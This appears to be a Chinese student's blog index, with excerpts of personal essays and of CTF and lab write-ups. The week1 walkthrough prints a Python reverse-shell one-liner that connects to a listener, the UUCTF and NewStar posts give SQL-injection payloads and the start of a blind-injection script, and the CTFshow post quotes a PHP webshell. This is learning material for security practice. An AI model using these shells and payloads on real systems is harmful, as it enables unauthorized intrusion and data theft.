week1
第一周信息收集首先进行本地ARP探测,这里可以发现存活的其他主机。发现我们的目标为192.168.18.3
进行端口探测
namp -p- ip #全端口探测
nmap -p22,5000 -sV ip #具体服务探测
这里可以发现这里5000端口是一个web服务。我们进去访问看一下。
然后这里我们使用dirsearch扫描可以扫描到一个 admin的隐藏目录。
打点这里的话意思就是可以让我们执行一个python的代码,有这么一个环境。那么我们就可以监听本地端口。然后看一下是否可以反弹shell。
nc -nlvp 4444 #监听4444端口
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.18.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&qu ...
2022年终总结
看自己Time: 2022年12月31日 | 元旦节的前一天🎉
作为一个未来的大黑客(现在的小菜鸡)怎么可能不写年终总结呢。(那为什么鸽了两年呢?)这个我也不知道。今年确实是一个魔幻的年。三年过去还是没躲过这个病毒,不过到了现在也是比较轻松的过去了,虽然也是发烧了两天。今年也算是小有收获,在这里也是记录一下今年的一些收获和一些反思。出发!赛博回忆录。
首先必不可少的就是对于自己的一些看法了,论如何看待自己?人确实是感性的动物,我一直想能够理性的去看待事情,但还是总掉入到情绪的坑里。其实从高中到大学,我觉得自己变化还是很多的。以前有各种的不自信,遇到很多事第一个想到的是逃避。害怕去面对。到了现在其实改变了很多,我认为自己还是比较自信的了,碰到事情不会再那么的害怕害羞之类的。可以大大方方的去表达自己的感受。这也算是一个很不错的进步吧。但是表达欲好像是有在减少的。说实话我在这里敲键盘的时候就不知道该说一些啥了。
从大学入学到现在也有两年多了,这两年多接触到的人和事都是非常多的,我也逐渐有了自己的一些想法和理念。或许这就是成长吧。中间也是少不了老师的一些帮助。我很庆幸自己在大学里面能够遇上对 ...
11月随笔
突然发现自己已经有半个多月没有更新博客了。想着就写一下近段时间的一些事情和想法。上了大学之后,感觉时间确实转得更快了。哗的一下就从我身边溜走了一大半。从入学到现在还是不敢想象现在已经大三了。很不幸,疫情到现在还是没结束。甚至头一次离我这么近。以前总想着上了大学之后呢,可以有更多的时间来玩。可以玩我一直想玩的游戏,想去做很多没做过的事。但是到现在,发现自己对于一些事情的兴趣越来越少。越来越宅,虽然以前也很宅。也可能是一个好事呢,毕竟封校对我来说是没啥影响的。上面放的图还是上个月去上课的时候从图书馆旁边的小路过的时候发现这个人造小彩虹。这个月已经开始在宿舍上网课了呢。
以前就体会很深的一句话,计划永远赶不上变化。前期有很多的规划,但是一到真正要面临的时候,可以会遭遇到很多的变数。事情在变,人也是会变的。有时候会想,成长带给我们的是什么。又是什么时候我们发现自己成长了。成长好像就是会把自己的事藏得越来越深。会慢慢理解父母的想法。会体验到责任的感觉。尤其是在这个大三这个阶段,其实已经要半只脚踏入社会了。需要想的东西会越来越多,在现在互联网时代,看到别人的优秀自己的内耗就会越来越严重,变得焦虑 ...
UUCTF
ezsql这里就是把我们的语句全部倒序了,然后过滤双写绕过即可
#"FTCUU"=amehcs_elbat erehw selbat.amehcs_noitamrofni moorrf)eman_elbat(tacnoc_puoorrg,1 tceles noinu)'( 查表
#"galf"=eman_elbat dna "FTCUU"=amehcs_elbat erehw snmuloc.amehcs_noitamrofni moorrf)eman_nmuloc(tacnoc_puoorrg,1 tceles noinu)'( 查列
查数据
#galf moorrf))FTCUU,'~'(sw_tacnoc(tacnoc_puoorrg,1 tceles noinu)'(
phonecode看题目提示下一次必定命中,然后输入手机号。
只有改变手机号然后给我们的hint才会改变。这里猜测就是伪随机数。进行爆破即可
这几个都试试
发现是2820130815 ...
NewStar公开赛
week2Word-For-You(2 Gen)sql注入,这里有很多方式都可以注入。可以进行报错或者盲注都可以。贴脚本。
# @Time : 2022/9/26 15:47# @Author : xiaoqiuxx# @File : NewStar新生赛.py# @Team : 少年游import timeimport requestsurl = "http://302bec96-9e18-41a4-9d39-802a7f48776b.node4.buuoj.cn:81/comments.php"result = ''for i in range(155, 300): head = 0 tail = 127 while head < tail: mid = (head + tail) >> 1 # 右移除2 # payload2 = { # "name": f"NewCTFer'and(ascii(subst ...
CTFshow新手杯WP
做了三道题。第五题看不懂,第二题一直打不开。平台老崩。;-)
easy_eval<?phperror_reporting(0);highlight_file(__FILE__);$code = $_POST['code'];if(isset($code)){ $code = str_replace("?","",$code); eval("?>".$code);?>
代码清晰简单,就是一个代码执行函数eval,但是这里存在一个过滤。
str_replace("?", "", $code);
只要我们传入的内容存在问号?都会被替换为空。注意这个函数,如果是在sql注入内的话,我们可以通过双写绕过。
这里像这样单个字符是会被全部过滤掉的。
所以这里的话我们考虑的话就是要不存在问号的内容。我们其实可以知道php的一句话木马有几种常用的方式
<?php eval($_POST['cmd']);?> / ...
Hello World!
Hello world!大一的时候其实就已经想要搭一个博客了,但是因为各种不知道什么的原因一直到了今天才有了这个小博客。可能也是因为比较拖拉的原因吧。也是怕麻烦,之前有过在csdn写博客,但是感觉就是不太好。所以也就没有写下去,一直把东西都写在了本地。之后发现语雀挺好的,就把笔记开始写在语雀上面。但是呢,我还是想要个人博客,我可以通过这个博客来表达我自己的一些想法。也可以用来记录自己的成长。在离开学校正式踏入社会前,我可以回头看一看我这几年的成长路线,也算是给自己留下了一个纪念册。希望不会是秃头时间轴。
printf("hello world!");
从踏入学校第一次在电脑上输出上面这句hello world。到现在已经是第三年了,在这两年当中我敲了很多很多的hello world。写过很多语言的hello world。但是都没有第一次那种兴奋的感觉了。确实昂,第一次印象总是最深刻的,最让人怀念的。在高考完那个暑假,我没有想过我会学习什么专业,一直到报考专业的时候,我也没有一个坚定的想法,一开始的我是想要干土木来着!在报考了软件工程的时候,我也不知道软件工程是干什 ...